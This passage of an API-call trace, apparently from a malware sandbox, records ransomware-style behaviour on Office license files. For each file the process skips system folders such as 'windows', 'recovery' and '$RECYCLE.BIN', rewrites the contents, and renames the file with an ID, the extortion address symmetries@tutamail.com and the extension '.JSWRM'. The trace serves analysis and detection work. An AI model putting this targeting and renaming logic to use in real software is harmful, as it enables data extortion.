[0105.457] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\O365ProPlusR_Subscription3-ul-oob.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\o365proplusr_subscription3-ul-oob.xrm-ms"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x45c [0105.458] GetFileSizeEx (in: hFile=0x45c, lpFileSize=0x345ebf8 | out: lpFileSize=0x345ebf8*=11646) returned 1 [0105.458] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0105.458] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x2d70) returned 0x24c1d0 [0105.458] ReadFile (in: hFile=0x45c, lpBuffer=0x24c1d0, nNumberOfBytesToRead=0x2d70, lpNumberOfBytesRead=0x345ec04, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesRead=0x345ec04*=0x2d70, lpOverlapped=0x0) returned 1 [0105.470] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0105.470] WriteFile (in: hFile=0x45c, lpBuffer=0x24c1d0*, nNumberOfBytesToWrite=0x2d70, lpNumberOfBytesWritten=0x345ec00, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesWritten=0x345ec00*=0x2d70, lpOverlapped=0x0) returned 1 [0105.471] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24c1d0 | out: hHeap=0x1e0000) returned 1 [0105.471] CloseHandle (hObject=0x45c) returned 1 [0105.471] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xc0) returned 0x24bce0 [0105.471] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0105.471] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22ce70 [0105.471] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22ce70, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0105.471] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0d8 [0105.471] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ce70 | out: hHeap=0x1e0000) returned 1 [0105.471] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0105.471] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a3c0 [0105.471] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a3c0, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0105.471] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a3c0 | out: hHeap=0x1e0000) returned 1 [0105.471] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xc0) returned 0x24b8f8 [0105.471] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x11e) returned 0x23f5f8 [0105.471] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24b8f8 | out: hHeap=0x1e0000) returned 1 [0105.471] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0d8 | out: hHeap=0x1e0000) returned 1 [0105.471] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\O365ProPlusR_Subscription3-ul-oob.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\o365proplusr_subscription3-ul-oob.xrm-ms"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\O365ProPlusR_Subscription3-ul-oob.xrm-ms.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\o365proplusr_subscription3-ul-oob.xrm-ms.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0105.472] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23f5f8 | out: hHeap=0x1e0000) returned 1 [0105.472] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24bce0 | out: hHeap=0x1e0000) returned 1 [0105.472] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24bda8 | out: hHeap=0x1e0000) returned 1 [0105.472] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0105.472] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0105.473] FindNextFileW (in: hFindFile=0x231d40, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xe6412a1d, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xe6412a1d, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xe64f781d, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x2bbb, dwReserved0=0xa000000c, dwReserved1=0x23307e, cFileName="O365ProPlusR_Subscription4-pl.xrm-ms", cAlternateFileName="O3DFB3~1.XRM")) returned 1 [0105.473] lstrcmpiW (lpString1="O365ProPlusR_Subscription4-pl.xrm-ms", lpString2=".") returned 1 [0105.473] lstrcmpiW (lpString1="O365ProPlusR_Subscription4-pl.xrm-ms", lpString2="..") returned 1 [0105.473] lstrcmpiW (lpString1="O365ProPlusR_Subscription4-pl.xrm-ms", lpString2="...") returned 1 [0105.473] lstrcmpiW (lpString1="O365ProPlusR_Subscription4-pl.xrm-ms", lpString2="windows") returned -1 [0105.473] lstrcmpiW (lpString1="O365ProPlusR_Subscription4-pl.xrm-ms", lpString2="recovery") returned -1 [0105.473] lstrcmpiW (lpString1="O365ProPlusR_Subscription4-pl.xrm-ms", lpString2="perflogs") returned -1 [0105.473] lstrcmpiW (lpString1="O365ProPlusR_Subscription4-pl.xrm-ms", lpString2="documents and settings") returned 1 [0105.473] lstrcmpiW (lpString1="O365ProPlusR_Subscription4-pl.xrm-ms", lpString2="$RECYCLE.BIN") returned 1 [0105.473] lstrcmpiW (lpString1="O365ProPlusR_Subscription4-pl.xrm-ms", lpString2="system volume information") returned -1 [0105.473] lstrcmpiW (lpString1="O365ProPlusR_Subscription4-pl.xrm-ms", lpString2="msocache") returned 1 [0105.473] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22c7a0 [0105.473] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="O365ProPlusR_Subscription4-pl.xrm-ms", cchWideChar=36, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 36 [0105.473] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0105.473] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="O365ProPlusR_Subscription4-pl.xrm-ms", cchWideChar=36, lpMultiByteStr=0x22cdc8, cbMultiByte=36, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="O365ProPlusR_Subscription4-pl.xrm-ms", lpUsedDefaultChar=0x0) returned 36 [0105.473] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22c7a0 | out: hHeap=0x1e0000) returned 1 [0105.473] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22c5e8 [0105.473] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="O365ProPlusR_Subscription4-pl.xrm-ms", cchWideChar=36, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 36 [0105.473] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22ce70 [0105.473] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="O365ProPlusR_Subscription4-pl.xrm-ms", cchWideChar=36, lpMultiByteStr=0x22ce70, cbMultiByte=36, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="O365ProPlusR_Subscription4-pl.xrm-ms", lpUsedDefaultChar=0x0) returned 36 [0105.473] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22c5e8 | out: hHeap=0x1e0000) returned 1 [0105.473] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x236468 [0105.473] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24b2b8 | out: hHeap=0x1e0000) returned 1 [0105.473] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0105.473] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345ec64, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0105.473] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x236520 [0105.473] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\O365ProPlusR_Subscription4-pl.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\o365proplusr_subscription4-pl.xrm-ms"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x45c [0105.474] GetFileSizeEx (in: hFile=0x45c, lpFileSize=0x345ebf8 | out: lpFileSize=0x345ebf8*=11195) returned 1 [0105.474] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0105.474] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x2bb0) returned 0x24c1d0 [0105.474] ReadFile (in: hFile=0x45c, lpBuffer=0x24c1d0, nNumberOfBytesToRead=0x2bb0, lpNumberOfBytesRead=0x345ec04, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesRead=0x345ec04*=0x2bb0, lpOverlapped=0x0) returned 1 [0105.476] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0105.476] WriteFile (in: hFile=0x45c, lpBuffer=0x24c1d0*, nNumberOfBytesToWrite=0x2bb0, lpNumberOfBytesWritten=0x345ec00, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesWritten=0x345ec00*=0x2bb0, lpOverlapped=0x0) returned 1 [0105.476] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24c1d0 | out: hHeap=0x1e0000) returned 1 [0105.476] CloseHandle (hObject=0x45c) returned 1 [0105.476] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x236188 [0105.476] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0105.476] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0105.476] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d0a0, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0105.476] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0d8 [0105.476] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0105.476] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0105.476] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a450 [0105.477] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a450, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0105.477] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a450 | out: hHeap=0x1e0000) returned 1 [0105.477] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xc0) returned 0x24b6a0 [0105.477] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x11e) returned 0x23ecb8 [0105.477] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24b6a0 | out: hHeap=0x1e0000) returned 1 [0105.477] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0d8 | out: hHeap=0x1e0000) returned 1 [0105.477] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\O365ProPlusR_Subscription4-pl.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\o365proplusr_subscription4-pl.xrm-ms"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\O365ProPlusR_Subscription4-pl.xrm-ms.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\o365proplusr_subscription4-pl.xrm-ms.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0105.477] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23ecb8 | out: hHeap=0x1e0000) returned 1 [0105.477] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236188 | out: hHeap=0x1e0000) returned 1 [0105.477] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236520 | out: hHeap=0x1e0000) returned 1 [0105.478] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ce70 | out: hHeap=0x1e0000) returned 1 [0105.478] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0105.478] FindNextFileW (in: hFindFile=0x231d40, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xe63c64e0, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xe63c64e0, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xe64d15f9, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x6e65, dwReserved0=0xa000000c, dwReserved1=0x23307e, cFileName="O365ProPlusR_Subscription4-ppd.xrm-ms", cAlternateFileName="O31633~1.XRM")) returned 1 [0105.478] lstrcmpiW (lpString1="O365ProPlusR_Subscription4-ppd.xrm-ms", lpString2=".") returned 1 [0105.478] lstrcmpiW (lpString1="O365ProPlusR_Subscription4-ppd.xrm-ms", lpString2="..") returned 1 [0105.478] lstrcmpiW (lpString1="O365ProPlusR_Subscription4-ppd.xrm-ms", lpString2="...") returned 1 [0105.478] lstrcmpiW (lpString1="O365ProPlusR_Subscription4-ppd.xrm-ms", lpString2="windows") returned -1 [0105.478] lstrcmpiW (lpString1="O365ProPlusR_Subscription4-ppd.xrm-ms", lpString2="recovery") returned -1 [0105.478] lstrcmpiW (lpString1="O365ProPlusR_Subscription4-ppd.xrm-ms", lpString2="perflogs") returned -1 [0105.478] lstrcmpiW (lpString1="O365ProPlusR_Subscription4-ppd.xrm-ms", lpString2="documents and settings") returned 1 [0105.478] lstrcmpiW (lpString1="O365ProPlusR_Subscription4-ppd.xrm-ms", lpString2="$RECYCLE.BIN") returned 1 [0105.478] lstrcmpiW (lpString1="O365ProPlusR_Subscription4-ppd.xrm-ms", lpString2="system volume information") returned -1 [0105.478] lstrcmpiW (lpString1="O365ProPlusR_Subscription4-ppd.xrm-ms", lpString2="msocache") returned 1 [0105.478] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22be00 [0105.478] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="O365ProPlusR_Subscription4-ppd.xrm-ms", cchWideChar=37, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 37 [0105.478] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0105.478] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="O365ProPlusR_Subscription4-ppd.xrm-ms", cchWideChar=37, lpMultiByteStr=0x22cdc8, cbMultiByte=37, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="O365ProPlusR_Subscription4-ppd.xrm-ms", lpUsedDefaultChar=0x0) returned 37 [0105.478] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22be00 | out: hHeap=0x1e0000) returned 1 [0105.478] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22c5e8 [0105.478] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="O365ProPlusR_Subscription4-ppd.xrm-ms", cchWideChar=37, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 37 [0105.478] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0105.478] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="O365ProPlusR_Subscription4-ppd.xrm-ms", cchWideChar=37, lpMultiByteStr=0x22d260, cbMultiByte=37, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="O365ProPlusR_Subscription4-ppd.xrm-ms", lpUsedDefaultChar=0x0) returned 37 [0105.478] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22c5e8 | out: hHeap=0x1e0000) returned 1 [0105.478] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x2362f8 [0105.478] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236468 | out: hHeap=0x1e0000) returned 1 [0105.478] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0105.478] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345ec64, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0105.478] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x2360d0 [0105.478] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\O365ProPlusR_Subscription4-ppd.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\o365proplusr_subscription4-ppd.xrm-ms"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x45c [0105.479] GetFileSizeEx (in: hFile=0x45c, lpFileSize=0x345ebf8 | out: lpFileSize=0x345ebf8*=28261) returned 1 [0105.479] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0105.479] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x6e60) returned 0x24c1d0 [0105.479] ReadFile (in: hFile=0x45c, lpBuffer=0x24c1d0, nNumberOfBytesToRead=0x6e60, lpNumberOfBytesRead=0x345ec04, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesRead=0x345ec04*=0x6e60, lpOverlapped=0x0) returned 1 [0105.482] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0105.482] WriteFile (in: hFile=0x45c, lpBuffer=0x24c1d0*, nNumberOfBytesToWrite=0x6e60, lpNumberOfBytesWritten=0x345ec00, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesWritten=0x345ec00*=0x6e60, lpOverlapped=0x0) returned 1 [0105.482] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24c1d0 | out: hHeap=0x1e0000) returned 1 [0105.482] CloseHandle (hObject=0x45c) returned 1 [0105.482] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x236240 [0105.482] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0105.482] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22ce70 [0105.482] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22ce70, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0105.482] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d298 [0105.482] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ce70 | out: hHeap=0x1e0000) returned 1 [0105.482] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0105.482] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a1f8 [0105.482] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a1f8, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0105.483] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a1f8 | out: hHeap=0x1e0000) returned 1 [0105.483] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xc0) returned 0x24c0c8 [0105.483] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x11e) returned 0x23ef08 [0105.483] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24c0c8 | out: hHeap=0x1e0000) returned 1 [0105.483] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d298 | out: hHeap=0x1e0000) returned 1 [0105.483] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\O365ProPlusR_Subscription4-ppd.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\o365proplusr_subscription4-ppd.xrm-ms"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\O365ProPlusR_Subscription4-ppd.xrm-ms.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\o365proplusr_subscription4-ppd.xrm-ms.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0105.483] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23ef08 | out: hHeap=0x1e0000) returned 1 [0105.483] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236240 | out: hHeap=0x1e0000) returned 1 [0105.483] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2360d0 | out: hHeap=0x1e0000) returned 1 [0105.484] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0105.484] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0105.484] FindNextFileW (in: hFindFile=0x231d40, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xe63a029d, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xe63a029d, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xe64ab356, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x2d7e, dwReserved0=0xa000000c, dwReserved1=0x23307e, cFileName="O365ProPlusR_Subscription4-ul-oob.xrm-ms", cAlternateFileName="O37C41~1.XRM")) returned 1 [0105.484] lstrcmpiW (lpString1="O365ProPlusR_Subscription4-ul-oob.xrm-ms", lpString2=".") returned 1 [0105.484] lstrcmpiW (lpString1="O365ProPlusR_Subscription4-ul-oob.xrm-ms", lpString2="..") returned 1 [0105.484] lstrcmpiW (lpString1="O365ProPlusR_Subscription4-ul-oob.xrm-ms", lpString2="...") returned 1 [0105.484] lstrcmpiW (lpString1="O365ProPlusR_Subscription4-ul-oob.xrm-ms", lpString2="windows") returned -1 [0105.484] lstrcmpiW (lpString1="O365ProPlusR_Subscription4-ul-oob.xrm-ms", lpString2="recovery") returned -1 [0105.484] lstrcmpiW (lpString1="O365ProPlusR_Subscription4-ul-oob.xrm-ms", lpString2="perflogs") returned -1 [0105.484] lstrcmpiW (lpString1="O365ProPlusR_Subscription4-ul-oob.xrm-ms", lpString2="documents and settings") returned 1 [0105.484] lstrcmpiW (lpString1="O365ProPlusR_Subscription4-ul-oob.xrm-ms", lpString2="$RECYCLE.BIN") returned 1 [0105.484] lstrcmpiW (lpString1="O365ProPlusR_Subscription4-ul-oob.xrm-ms", lpString2="system volume information") returned -1 [0105.484] lstrcmpiW (lpString1="O365ProPlusR_Subscription4-ul-oob.xrm-ms", lpString2="msocache") returned 1 [0105.484] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x60) returned 0x232c80 [0105.484] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="O365ProPlusR_Subscription4-ul-oob.xrm-ms", cchWideChar=40, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 40 [0105.484] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0105.484] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="O365ProPlusR_Subscription4-ul-oob.xrm-ms", cchWideChar=40, lpMultiByteStr=0x22d0a0, cbMultiByte=40, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="O365ProPlusR_Subscription4-ul-oob.xrm-ms", lpUsedDefaultChar=0x0) returned 40 [0105.484] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x232c80 | out: hHeap=0x1e0000) returned 1 [0105.484] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x60) returned 0x2330f8 [0105.484] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="O365ProPlusR_Subscription4-ul-oob.xrm-ms", cchWideChar=40, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 40 [0105.484] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0105.484] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="O365ProPlusR_Subscription4-ul-oob.xrm-ms", cchWideChar=40, 